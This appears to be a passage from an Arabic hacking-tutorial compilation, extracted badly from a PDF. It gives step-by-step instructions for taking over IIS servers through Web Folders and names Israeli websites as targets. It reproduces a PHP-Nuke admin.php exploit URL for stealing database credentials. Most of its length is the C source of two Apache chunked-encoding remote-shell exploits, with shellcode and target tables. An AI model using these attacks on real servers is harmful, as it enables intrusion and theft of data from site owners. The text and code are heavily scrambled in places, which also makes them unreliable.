الموقع الذي تريد ان تطبق عليه الثغرة‪.‬لكن المشكلة هنا انه لن يمكن تشغيلها تحت بيئة ويندوز‪.pl xxx. :‬‬ ‫هو برنامج سي لكنه سورس كود فقط‪..

0 on Windows 2000‬‬ ‫يا أخوان كل مانحتاجه هي اداه بسيطه يقدمها لنا وندوز ‪ 98‬وانني ل اعلم ان كانت النسخ الخرى تمتلك مثل‬ ‫هذه لخاصيه ام ل لنني اعمل على نظامين فقط لينكس ماندريك ووندوز ‪ 98‬فقط ‪:‬‬ ‫الداه هي ‪Web Folders :‬‬ ‫اين نجد هذه الثغره ‪:‬‬ ‫حسنًا سوف نجدها انشاءل في الخطوات التاليه ‪:‬‬ ‫ادخل على ‪My Computer‬‬ ‫ثم ستجدها هناك ليس داخل السي او شيء آخر بل داخل ‪ My Computer‬فقط يعني تكون هي مع السي‬ ‫والدي الى آخره‬ ‫نفتح يا أخون الملف المسمى ‪Web Folders‬‬ ‫ثم سنجد التي ‪:‬‬ ‫‪ Add Web Folder‬حيث هي التي ستكون اداتنا المهمه للختراق‬ ‫نفتح ال ‪: Add Web Folder‬‬ ‫حيث نجد كلمة ‪Type the location to add‬‬ ‫ونرى تحتها مستطيل نقوم بأدخال التي ‪:‬‬ ‫‪/http://hostname.com‬‬ ‫‪277‬‬ .‫انتهى‪،،،‬‬ ‫" تمتع بإختراق المواقع السرائيلية مع هذه الثغرة "‬ ‫>منقول من منتديات شبكة الحزم<‬ ‫>الكاتب‪<DeadLine :‬‬ ‫الشرح ‪:‬‬ ‫اوًل الثغره يا أخوان تطبق على سيرفرات ‪:‬‬ ‫‪Microsoft-IIS/5.

‫حيث ان ‪ hostname‬هو ايبي الموقع انتبه قلنا ايبي الموقع وليس السم‬ ‫والجميع يعرف كيف يخرج اليبي تبع الموقع وهناك دروس كثيره بخصوص هذا الموضوع‬ ‫وهذه مواقع اسرائيليه للتطيبق حيث انها تعمل على ايبي موحد ‪:‬‬ ‫‪mail.143.121‬‬ ‫ثم نضغط على كلمة ‪Next :‬‬ ‫وهنا سوف تعمل الداه بتحميل ملفات الموقع وتعطيك خاصية الدمن وهي تحميل وازالة الملفات‬ ‫فبعد ان ينتهي البرنامج من التحميل تظهر لك كلمة ‪finish :‬‬ ‫عندها تذهب الى ال ‪ Web Folder :‬وتجد ملف الموقع هناك ومسمى تحت ايبي الموقع‬ ‫موقع اخر للتطبيق ‪:‬‬ ‫‪http://www.43.117.talcar.84‬‬ ‫ملحظه ‪ :‬اذا تم طلب ادخال باسوورد ويوزر نيم فأعرف ان الثغره مغلقه‬ ‫او اذا دخلت الى الملفات ولم تجد اي ملف فمعناه ان الثغره مغلقه ايضًا‬ ‫اسئل ال التوفيق والعافيه اللهم امين اللهم امين‪.co.co.il‬‬ ‫‪daihatsu-israel.israwine.il/ 212.il‬‬ ‫‪daewoo-israel.co.il‬‬ ‫ندخل بالمستطيل الذي تم ذكره ‪:‬‬ ‫‪/http://192.199.co.‬‬ ‫انتهى‪،،،‬‬ ‫‪278‬‬ .

server..net/admin.txt 279 ..php&userfile_name=hacked.php&file_name=hacked. Summary This time the bug is really dangerous." ‫" ثغرة نيوك‬ <‫>ةةةةة‬ >Arab VireruZ :‫>ةةةةةة‬ : ‫الشرح بالنقليزية‬ twlc: here your 0day from LucisFero and supergate Posted on Monday..the box.Php nuke BUGGED :Found by LucisFero and supergate twlc/. is ok while the final 5.. September 24 @ 14:25:58 CDT topic: advisories twlc security divison 24/09/2001 ..2 is (bugged Explanation ?Do you need sql password http://www.it allows you to 'cp' any file on . or even upload files Systems Affected all the versions ARE vulnerable except '5..0 RC1' (i wonder why a released c.php? upload=1&file=config.txt&wdir=/images/&userfil e=config.

i leave you the 'fun' to find all the ways to use it. cause we wanted to remove the file manager -anyway but i suggest you to do the same.twlc...."lastaction = "". admin.net article http://www.fear him and you should too :posted at http://www.net/images/hacked.("include("footer.exit { that doesnt do a check to see if you are logged as admin or no.textcols = 85$ .php?op=FileManager ... this software is used by thousands of people...net/article.(chdir($basedir . -to upload files use FTP :conclusions yet another bug of php nuke.."if($cancel) $op="FileManager } (if($upload .$basedir..."/"=wdir2$ .server. 2 hours before didnt knew php .(GraphicAdmin($hlpfile// .php?sid=421 bugtraq@securityfocus.. $wdir2 .$userfile_name .()CloseTable// . Prolly the funny thing is that who first discovered the bug was LucisFero that..php// .(udir = dirname($PHP_SELF$ ... so i (supergate) .textrows = 20$ ..$wdir. you can even upload files.(basedir = dirname($SCRIPT_FILENAME$ .php contains this routine .()displaydir// . and try to dont be a SCRIPT KIDDIE we wrote this advisory to help who runs php nuke .php// .the admin 'login' page will be prompted just go to http://www.." $userfile_name --> $wdir$ This need a rewrite -------------------------------------> OMG! WE TOTALY // AGREEEEEEEE lmao .twlc.(copy($userfile..com 280 .php that as everyone knows contain the sql's passwords.can use it anyway Solution we erased the function.()html_header// .._UPLOADED.and NOT TO LET YOU HAVE FUN :let me explain you the bug."/"=if(!$wdir) $wdir .("Header("Location: admin...("include("header.txt and you will see config.. (we run something based on it too) i hope that this time the author will reply soon and will release a patch too! as i said before just dont try to be a script kiddie or we simply WONT post anymore this kind of advisories. so you ..

textcols = 85$ .net (yes we are patched .()CloseTable// .php? upload=1&file=config.txt&wdir=/images/&userfil e=config.("include("footer. bella a tutti eof -=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-= =-=-=-=-=-=-=-=-=-=-= :‫الخطأ البرمجي‬ .()displaydir// .()html_header// .net supergate@twlc.("Header("Location: admin.exit { -=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-= =-=-=-=-=-=-=-=-=-=-= :‫الثغرة‬ http://www.$userfile_name . remember that trojans are :(directed to /dev/null lucisfero@twlc.peace out pimps.(chdir($basedir . $wdir2 .(basedir = dirname($SCRIPT_FILENAME$ .(udir = dirname($PHP_SELF$ .org -good luck http://sourceforge.twlc. insults.php&userfile_name=hacked."/"=wdir2$ .$basedir._UPLOADED."/"=if(!$wdir) $wdir ..(GraphicAdmin($hlpfile// ."if($cancel) $op="FileManager } (if($upload .php// .net/tracker/?group_id=7511 Project: PHP-Nuke Web Portal System and of course mailed to the author of php nuke contacts (bugs.php?op=FileManager .(copy($userfile..net (http://www.textrows = 20$ .net/admin."lastaction = "". cool girls. ideas." $userfile_name --> $wdir$ This need a rewrite -------------------------------------> OMG! WE TOTALY // AGREEEEEEEE lmao .-http://www.php// .phpnuke.server.php&file_name=hacked.("include("header.txt 281 .$wdir.

2‬كما يظن البعض‪.php‬الى الملف النصي الموجود ‪ ultramode.php‬‬ ‫‪upload=1&file=config.php&file_name=ultramode.php&userfile_name=ultramode.txt‬لن تحتاج تحميل ملف‬‫نصي لطبع الملف‬ ‫كما هو موجود بالشرح النقليزي يعني فكر واستنتج ‪ (-:‬ولن بعض المواقع تمنع التحميل الى الموقع الن‬ ‫ما عليك سوى الدخول الى ‪http://server.com/nuke :‬‬ ‫‪ -3‬هذه الثغرة ل تعمل مع اصدار ‪ 5.txt&wdir=/&userfile=co‬‬ ‫‪nfig.‫=‪-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-‬‬ ‫=‪=-=-=-=-=-=-=-=-=-=-‬‬ ‫الثغرة بعد التعديل‬ ‫?‪http://www.txt‬‬ ‫وستجد باس واليوزر التابع لقاعدة بيانات الموقع=‪-‬‬ ‫ملحظات‬ ‫‪ -1‬بدل ‪ server.com‬بالموقع الراد اختراقه‬ ‫‪ -2‬تأكد من موقع المجلة مثال ‪http://server.com/ultramode.server.net/admin.‬‬ ‫انتهى‪،،،‬‬ ‫‪282‬‬ .txt‬‬ ‫=‪-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-‬‬ ‫=‪=-=-=-=-=-=-=-=-=-=-‬‬ ‫عمل الثغرة‪:‬‬ ‫=طبع ملف الكونفيج ‪ config.

36‬وهي في الروتين البرمجي الذي‬ ‫يتعامل مع رسائل الخطأ‬ ‫هذان الستثماران تستخدمان من قبل مهاجم بعيد لتسبب طفح محلي في السيرفر المصاب ‪ ،‬مؤديه بذلك إلى‬ ‫إعادة كتابه في الذاكرة ‪ ،‬وبطريقة ما تسمح لتنفيذ كود‬ ‫‪ ))*/‬قد تم تجريبها وإختبارها من قبل ‪ angels-bytes.‬‬ ‫إذا أردت معالجة هذه الثغره عند وجودها فأنصحك بتنزيل أباتشي ‪ 2.0.24‬واعلى إلى ‪ 2‬و من ‪ 2‬إلى ‪ ، dev-2.org/dist/httpd/binaries‬‬ ‫أما لمسألة إستثمار هذه الثغره فسوف أضع لكم أفضل أستثمارين‬ ‫الخطأ في أباتشي ‪ 1.apache.0.39‬فهو الفضل الى الن‬ ‫هذه هي وصلة التنزيل‬ ‫‪http://www.‫" ثغرة ‪" Chunked‬‬ ‫>ةةةةة ةة ةةةة‬ ‫‪<angels-bytes‬‬ ‫كلنا سمع بثغره تسمى ‪ Chunked‬لـ ‪ ، Apache‬السبب لعدم تحدث موقع ‪ angels-bytes‬عنها هو‬ ‫أنها أتت قبل إنطلق الموقع ‪ ،‬الن سأضع ‪ ، Retina Apache Chunked Scanner‬وهي أداة‬ ‫تقوم بفحص نطاق من ‪ 254‬عنوان آي بي ‪ ،‬وتظهر لك ما منها مصاب بهذه الثغره‪.com‬قبل وضعها لكم هنا ((‬ ‫*‪/‬‬ ‫‪*/‬حصلنا عليها من سيكورتي تيم*‪/‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪283‬‬ .3.

p += strlen(s# .define PUT_BYTES(n. s.include# include# define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it# /* failed define RET_ADDR_INC 512# define MEMCPY_s1_OWADDR_DELTA -146# define PADSIZE_1 4# define PADSIZE_2 5# define PADSIZE_3 7# define REP_POPULATOR 24# define REP_RET_ADDR 6# define REP_ZERO 36# define REP_SHELLCODE 24# define NOPCOUNT 1024# define NOP 0x41# '\\define PADDING_1 \\'A# '\\define PADDING_2 \\'B# '\\define PADDING_3 \\'C# . b) memset(p. n). p += n# define SHELLCODE_LOCALPORT_OFF 30# = []char shellcode \x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x10\\\\ "\\\ \\x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\xb8 \\\ "\\\x1f\\ \x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x7a\\\\ "\\\ \\x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x7a \\\ "\\\x02\\ \x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x90\\\\ "\\\ \\xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x24 \\\ "\\\x04\\ \x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\xc7\\\\ "\\\ \\x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x00 \\\ "\\\xb8\\ \x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\xff \\\\ "\\\ \\x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x08 \\\ "\\\x03\\ \x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x0b \\\\ "\\\ \\x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x01 \\\ "\\\x89\\ 284 . b. strlen(s)).(define PUT_STRING(s) memcpy(p.

3."\\\xcc\\ } struct . 0x8f2a6"\\\ } .1 x86 / Apache 1.0.unsigned char buf[512].3.3./apache-scalp 3 127.{ OpenBSD 3. i < sizeof(targets)/8.int i.int bruteforce.3.--.3.char *type .1:8080\\\\n printf(\\\" Using bruteforce:\\\\t.type .{ OpenBSD 3.3. 0x932ae"\\\ } .(printf(\\\"\\\\t%d / %s\\\\n\\\". progress .1 x86 / Apache 1.struct sockaddr_in sin. that say OpenBSD here { .0.24\\\". j. 0x8f0aa"\\\ } .u_long retaddr . 0x9011a"\\\ } . 0x90600"\\\ } .0.20\\\"..0. yes theo.22\\\". owned.{ OpenBSD 3.("\\\127.return -1 { 285 . argv[0 .24\\\".char *hostp.{ OpenBSD 3.----\\\\n .1:8080\\\\n . 0x90600"\\\ } .24 #2\\\". i .0 x86 / Apache 1./apache-scalp 0x8f000 . lport . *portp .1 x86 / Apache 1. *expbuf.{ OpenBSD 3.("\\\printf(\\\"Target ID / Target specification\\\\n (++for(i = 0.{ OpenBSD 3.3.0 x86 / Apache 1.{ OpenBSD 3.("\\\printf(\\\" Using targets:\\\\t. *p .{ } ([]int main(int argc.("\\\printf(\\\"\\\\n--.1 x86 / Apache 1.0 x86 / Apache 1.\xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x6a\\\\ "\\\ \\x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\xcd \\\ "\\\x80\\ \x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x2f\\\\ "\\\ \\x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\xc0 \\\ "\\\x50\\ \x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x50\\\\ "\\\ \\xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\ .([printf(\\\"Usage: %s \\\\n\\\".int sock . char *argv . targets[i].--. from } (if(argc != 3 .20\\\". 0xcf92f"\\\ } .23\\\".Potential targets list .u_long retaddr !targets[] = { // hehe. i.

++retaddr ((else if(memchr(&retaddr.("\\\:"\\\ .sin_port = htons(atoi(portp (if(!progress .(lport = ntohs(from.retaddr += RET_ADDR_INC /* skip invalid return adresses */ ."\\\portp = \\\"80 . &i) != 0 .continue . progress = 0.bruteforce = 0 { else . 4) || memchr(&retaddr.("\\\()perror(\\\"connect .i = retaddr & 0xff (if(i == 0x0a || i == 0x0d .(retaddr = strtoul(argv[1].. SIG_IGN } (for(owned = 0.retaddr = targets[retaddr].sin_port 286 . SOCK_STREAM.printf(\\\"\\\\n[*] Connecting .(exit(1 { (if(!progress . NULL.(exit(1 { .sin_addr. (struct sockaddr *) & sin.((sin.(()srand(getpid .[hostp = strtok(argv[2 (if((portp = strtok(NULL. 0x0d. sizeof(sin)) != 0 .bruteforce = 1 .. 16 } (if(retaddr < sizeof(targets)/8 . (struct sockaddr *) & from.s_addr = inet_addr(hostp .(sock = socket(AF_INET.(sin.sin_family = AF_INET . 0x0a. 4 .sin.("\\\ .(fflush(stdout } (if(connect(sock.(i = sizeof(from } (if(getsockname(sock.(signal(SIGPIPE.("\\\()perror(\\\"getsockname . 0 .retaddr . \\\":\\\")) == NULL ..("\\\printf(\\\"connected!\\\\n /* Setup the local port in our shellcode */ .

("\\\PUT_STRING(\\\"GET / HTTP/1.(PUT_STRING(buf . expbuf.("\\\PUT_STRING(\\\"\\\\r\\\\n { } (++for (i = 0. i .shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * (REP_SHELLCODE PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) *)) + .((REP_POPULATOR . \\\"\\\\r\\\\n%x\\\\r\\\\n\\\".(PUT_BYTES(REP_ZERO. PADDING_3 . .++progress (if((progress%70) == 0 . \\\"\\\\r\\\\n%x\\\\r\\\\n\\\".p++ = (retaddr >> 16) & 0xff* . j < REP_RET_ADDR.("\\\ :"\\\)PUT_STRING . shellcode.("\\\PUT_STRING(\\\"\\\\r\\\\n { . PADSIZE_2 .(PUT_BYTES(PADSIZE_1.p++ = retaddr & 0xff* .1 .(MEMCPY_s1_OWADDR_DELTA . 0 .(write(sock.. sizeof(buf) . PADDING_1 .p++ = (retaddr >> 24) & 0xff* { .(PUT_BYTES(PADSIZE_2.1.p++ = (retaddr >> 8) & 0xff* .(PUT_BYTES(NOPCOUNT. i < REP_SHELLCODE.1\\\\r\\\\nHost: apache-scalp. p . PADDING_2 snprintf(buf.("\\\-PUT_STRING(\\\"X . sizeof(shellcode) .p += sizeof(shellcode) .1 .(PUT_STRING(buf .(memcpy(p.c\\\\r\\\\n } (++for (i = 0.progress = 1 287 .expbuf . j .("\\\PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n .shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff . i .("\\\-PUT_STRING(\\\"X . i < REP_POPULATOR.(PUT_BYTES(PADSIZE_3. NOP . sizeof(buf) .1.(snprintf(buf.("\\\ :"\\\)PUT_STRING } (++for (j = 0.

((write(sock. &fds (if((n = read(sock.echo hehe.int n .break } (if(!owned && n >= 4 && memcmp(buf.(FD_ZERO(&fds . &fds (if((n = read(0.strlen(buf .1)) < 0 . strlen(expbuf . 4) == 0 .(write(sock. sizeof(buf) .((memset(buf. buf.(printf(\\\"retaddr 0x%lx did the trick!\\\\n\\\".tv. &fds. length %u.fd_set fds . n 288 .struct timeval tv . n { } ((if(FD_ISSET(0."\\\%u . &fds . \\' \\'. sizeof(buf } (if(select(sock + 1. sizeof(buf) .'\\)putchar { else . now use 0day OpenBSD local . 0. retaddr sprintf(expbuf.("\\\printf(\\\"\\\\nGOBBLE GOBBLE!@#%%)*#\\\\n .('\\putchar((rand()%2)? \\'P\\': \\'p . \\\"uname -a.tv_sec = EXPLOIT_TIMEOUT .(puts(buf (if(bruteforce . sizeof(buf sprintf(buf.(exit(1 .expbuf). localport .(FD_SET(0. (unsigned int)(p .((memset(buf.tv_usec = 0 .++owned { .(write(1. &fds .tv. buf.("\\\kernel exploit to gain instant r00t\\\\n . 74 .((memset(buf + strlen(buf).id.1)) <= 0 .(fflush(stdout } (while (1 .} (if(progress == 1 . \\\"\\\\r[*] Currently using retaddr 0x%lx. lport . 0. &tv) > 0 } ((if(FD_ISSET(sock. \\\"\\\\nok\\\\n\\\". buf. buf.(retaddr. NULL.('\\.(FD_SET(sock. NULL. expbuf.

c\\\" /* The Host: field# define DEFAULT_CMDZ \\\"uname -a. hehehe!\\\\n .\\\\n define RET_ADDR_INC 512# define PADSIZE_1 4# define PADSIZE_2 5# define PADSIZE_3 7# 289 .break { . \\\"Ooops.{ { (if(!owned .id.(free(expbuf . now use another# "\\\bug/backdoor/feature (hi Theo!) to gain instant r00t\\'.return -1 { { .return 0 } (if(!bruteforce .echo \\'hehe.("\\\fprintf(stderr.(close(sock (if(owned .return 0 { :Exploit #2 include# include# include# include# include# include# include# include# include# include# include# __ifdef __linux# include# endif# /* define HOST_PARAM \\\"apache-nosejob..

s.define REP_POPULATOR 24# define REP_SHELLCODE 24# define NOPCOUNT 1024# define NOP 0x41# '\\define PADDING_1 \\'A# '\\define PADDING_2 \\'B# '\\define PADDING_3 \\'C# . p += strlen(s# . p += n# = []char shellcode \x68\\\\x47\\\\x47\\\\x47\\\\x47\\\\x89\\\\xe3\\\\ "\\\ \\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xc6 \\\ "\\\x04\\\\x24\\ \x04\\\\x53\\\\x50\\\\x50\\\\x31\\\\xd2\\\\x31\\\\ "\\\ \\xc9\\\\xb1\\\\x80\\\\xc1\\\\xe1\\\\x18\\\\xd1 \\\ "\\\xea\\\\x31\\ \xc0\\\\xb0\\\\x85\\\\xcd\\\\x80\\\\x72\\\\x02\\\\ "\\\ \\x09\\\\xca\\\\xff\\\\x44\\\\x24\\\\x04\\\\x80 \\\ "\\\x7c\\\\x24\\ \x04\\\\x20\\\\x75\\\\xe9\\\\x31\\\\xc0\\\\x89\\\\ "\\\ \\x44\\\\x24\\\\x04\\\\xc6\\\\x44\\\\x24\\\\x04 \\\ "\\\x20\\\\x89\\ \x64\\\\x24\\\\x08\\\\x89\\\\x44\\\\x24\\\\x0c\\\\ "\\\ \\x89\\\\x44\\\\x24\\\\x10\\\\x89\\\\x44\\\\x24 \\\ "\\\x14\\\\x89\\ \x54\\\\x24\\\\x18\\\\x8b\\\\x54\\\\x24\\\\x18\\\\ "\\\ \\x89\\\\x14\\\\x24\\\\x31\\\\xc0\\\\xb0\\\\x5d \\\ "\\\xcd\\\\x80\\ \x31\\\\xc9\\\\xd1\\\\x2c\\\\x24\\\\x73\\\\x27\\\\ "\\\ \\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xff \\\ "\\\x04\\\\x24\\ \x54\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\ "\\\ \\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\x51 \\\ "\\\x50\\\\xb0\\ \x1d\\\\xcd\\\\x80\\\\x58\\\\x58\\\\x58\\\\x58\\\\ "\\\ \\x58\\\\x3c\\\\x4f\\\\x74\\\\x0b\\\\x58\\\\x58\\\ "\\\x41\\\\x80\\ \xf9\\\\x20\\\\x75\\\\xce\\\\xeb\\\\xbd\\\\x90\\\\ "\\\ \\x31\\\\xc0\\\\x50\\\\x51\\\\x50\\\\x31\\\\xc0 \\\ "\\\xb0\\\\x5a\\ \xcd\\\\x80\\\\xff\\\\x44\\\\x24\\\\x08\\\\x80\\\\ "\\\ \\x7c\\\\x24\\\\x08\\\\x03\\\\x75\\\\xef\\\\x31\\\ "\\\xc0\\\\x50\\ \xc6\\\\x04\\\\x24\\\\x0b\\\\x80\\\\x34\\\\x24\\\\ "\\\ \\x01\\\\x68\\\\x42\\\\x4c\\\\x45\\\\x2a\\\\x68 \\\ "\\\x2a\\\\x47\\ \x4f\\\\x42\\\\x89\\\\xe3\\\\xb0\\\\x09\\\\x50\\\\ "\\\ 290 .define PUT_BYTES(n.(define PUT_STRING(s) memcpy(p. b) memset(p. strlen(s)). n). b.

5.5 x86 / Apache/1.{ FreeBSD 4. 0x80eda00.{ OpenBSD 3.24\\\".3.3.0 x86 / Apache 1.0 x86 / Apache 1.3.{ OpenBSD 3. 36"\\\ } .3.apache.1\\\". 0x80a7975. 5. 36"\\\ } OpenBSD 3. 6.("\\\printf(\\\"Usage: . 42 "\\\ } .("\\\printf(\\\" \\\\t\\\\t\\\\t(f)reebsd.\\x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\x04 \\\ "\\\xcd\\\\x80\\ \x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x73\\\\ "\\\ \\x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x89 \\\ "\\\xe3\\\\x50\\ \x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x50\\\\ "\\\ . 0x80a0000/fbsd.3. 0x8f2a6.5.5.victim .24 #2\\\". 6. 6. 36"\\\ } . -150. 0x80efa00. 0x98a00.c\\\\n\\\\n . /* we repeat retaddr thiz many times in the buffer /* int repzero.24 (Unix)\\\".{ NetBSD 1.1 x86 / Apache 1.("\\\printf(\\\" -h host[:port]\\\\tHost to penetrate\\\\n .23 (Unix)\\\". /* and \\\\0\\'z this many times !targets[] = { // hehe. 42 "\\\ } .22 (Unix)\\\". /* delta thingie /* u_long retaddr. 36"\\\ } .23\\\". -146.{ 36 . 6.{ OpenBSD 3.5.1 x86 / Apache 1. 0x932ae.3.5 x86 / Apache/1."\\\ } . 5. 5.{ OpenBSD 3.("\\\nosejob.\\\\n . -150.{ OpenBSD 3.2 x86 / Apache 1.23 (Unix)\\\".3.20\\\". 6.3.1 x86 / Apache 1. 0xcfa00. 0x90600.24 #2\\\".1 x86 / Apache 1.3. 0x80f3a00. 6.5. 36"\\\ } . (n)etbsd\\\\n . 36"\\\ } .{ OpenBSD 3. 6.3. -146. 36"\\\ } ."\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc \\\ . 6. -146.0 x86 / Apache 1. 36"\\\ } . 36"\\\ } . /* return address /* int repretaddr.{ } (void usage(void .{ NetBSD 1. -146.3. -90. 0x8f0aa.0 x86 / Apache 1.{ OpenBSD 3.2 x86 / Apache 1. -90.2 x86 / Apache 1.("\\\printf(\\\" -t #\\\\t\\\\t\\\\tTarget id.("\\\printf(\\\" Bruteforcing options (all required. (o)penbsd.3.3.3. -146.5. /* description for newbie penetrator /* !int delta.1 x86 / Apache 1.{ FreeBSD 4. -90.("\\\printf(\\\" -b 0x12345678\\\\t\\\\tBase address used for bruteforce\\\\n printf(\\\" \\\\t\\\\t\\\\tTry 0x80000/obsd. -146.("\\\printf(\\\" -o char\\\\t\\\\tDefault values for the following OSes\\\\n .3. 36"\\\ } . -90. 5. -146. 0x9011a. 42"\\\ } .23 (Unix)\\\".20\\\". 6. 0x80efa00. 6. 42 "\\\ } ./apache-nosejob <-switches> -h host[:80]\\\\n . 0x90600. } struct /* char *type. 0x80efa00.{ NetBSD 1.{ NetBSD 1.{ NetBSD 1. unless -o is used!):\\\\n .3.24 PHP 4.12 (Unix)\\\".2.24\\\". -146.{ OpenBSD 3. 42 "\\\ } . yes theo.20 (Unix)\\\". that say OpenBSD here { .22\\\". 6.2 x86 / Apache 1. 0x1d7a00.2 x86 / Apache 1.int i printf(\\\"GOBBLES Security Labs\\\\t\\\\t\\\\t\\\\t\\\\t. -90. 291 . -146. 0x80efa00.

\\\"t:b:d:h:w:c:r:z:o:\\\")) != -1 } (switch(i /* required stuff */ :'\\case \\'h . -150/fbsd. owned. i < sizeof(targets)/sizeof(victim).hostp = strtok(optarg (if((portp = strtok(NULL.("\\\:"\\\ .int responses.int bruteforce.struct hostent *he (if(argc < 4 .int i.("\\\printf(\\\" \\\\t\\\\t\\\\tTry -146/obsd. i. lport.Potential targets list . i .("\\\buffer\\\\n . *expbuf..("\\\printf(\\\" \\\\t\\\\t\\\\tTry 36 for openbsd/freebsd and 42 for netbsd\\\\n printf(\\\" -r #\\\\t\\\\t\\\\tNumber of times to repeat retadd in the . \\\":\\\")) == NULL . -90/nbsd. *portp.struct in_addr ia .------. argv. progress. sock .--.("\\\printf(\\\" \\\\t\\\\t\\\\taka auto0wncmdz\\\\n printf(\\\"\\\\nExamples will be published in upcoming apache-scalp. targets[i]. sc_timeout = 5 .(printf(\\\"% 3d / 0x%.------------\\\\n ."\\\portp = \\\"80 292 .struct sockaddr_in sin.("\\\printf(\\\" \\\\t\\\\t\\\\tTry 6 for openbsd/freebsd and 5 for netbsd\\\\n . targets[i].pdf\\\\n .\\\\n printf(\\\" -z #\\\\t\\\\t\\\\tNumbers of time to repeat \\\\\\\\0 in the .("\\\printf(\\\" Optional stuff:\\\\n printf(\\\" -w #\\\\t\\\\t\\\\tMaximum number of seconds to wait for .()usage .("\\\replies\\\\n .("\\\buffer\\\\n .("\\\overwrite\\\\n .("\\\printf(\\\"\\\\n--.--.(exit(1 { } ([]int main(int argc.bruteforce = 0 .u_char buf[512].((memset(&victim. 0.8lx / %s\\\\n\\\".char *hostp.. char *argv .("\\\HOWTO.\\\\n printf(\\\" -d -nnn\\\\t\\\\tmemcpy() delta between s1 and addr to . from .retaddr.---. shown_length = 0 . *cmdz = DEFAULT_CMDZ . *p .("\\\shellcode reply\\\\n printf(\\\" -c cmdz\\\\t\\\\tCommands to execute when our shellcode . j.("\\\printf(\\\" ID / Return addr / Target specification\\\\n (++for(i = 0.("\\\0x080e0000/nbsd. sizeof(victim } (while((i = getopt(argc.type .

break :'\\case \\'z .\\\\n\\\".++bruteforce } (switch(*optarg :'\\case \\'f .type = \\\"Custom target .retaddr .break /* !bruteforce */ :'\\case \\'b .(printf(\\\"Using %d as delta\\\\n\\\".delta .(victim.++bruteforce ..return -1 { .victim.((memcpy(&victim.repretaddr = 6 ."\\\victim. victim. victim.repretaddr .victim. sizeof(victim .repzero = atoi(optarg .delta = atoi(optarg .(victim. .victim.break /* predefined targets */ :'\\case \\'t } ((if(atoi(optarg) >= sizeof(targets)/sizeof(victim ."\\\victim. .break :'\\case \\'d ..(victim.type = \\\"OpenBSD 293 .victim.break :'\\case \\'o .type = \\\"FreeBSD .(victim.(victim. NULL.repzero = 36 .(printf(\\\"Number of zeroes will be %d\\\\n\\\".break :'\\case \\'o . &targets[atoi(optarg)].("\\\printf(\\\"Invalid target\\\\n .delta = -150 .repzero .retaddr = 0x80a0000 .break :'\\case \\'r .retaddr = strtoul(optarg.(victim.repretaddr = atoi(optarg printf(\\\"Repeating the return address %d times\\\\n\\\". 16 printf(\\\"Using 0x%lx as the baseadress while bruteforcing."\\\victim.

(printf(\\\"There\\'z no %s on this side of the Net!\\\\n\\\".printf(\\\"[*] Resolving target host ."\\\victim.break :default .("\\\printf(\\\"[-] Better luck next time!\\\\n .()usage ..retaddr = 0x80000 .s_addr = inet_addr(hostp)) == INADDR_ANY .retaddr || !victim.type = \\\"NetBSD . 4 } (else if((ia.victim.repzero = 42 .repretaddr = 5 .delta = -90 .repzero = 36 .(fflush(stdout .repretaddr = 6 . sc_timeout ..(shellcode\\\\n\\\".retaddr = 0x080e0000 .break :'\\case \\'n .s_addr.break { . hostp 294 .break :'\\case \\'c .repretaddr || !victim.("\\\style!!)\\\\n .(memcpy(&ia.return -1 { . At least 1 argument is missing (nmap .victim.victim. he->h_addr.break :default .cmdz = optarg .(sc_timeout = atoi(optarg printf(\\\"Waiting maximum %d seconds for replies from .delta = -146 .delta || !victim.victim.victim.break { { } (if(!victim.victim.repzero printf(\\\"[-] Incomplete target.victim.victim.("\\\ .(he = gethostbyname(hostp (if(he .break /* optional stuff */ :'\\case 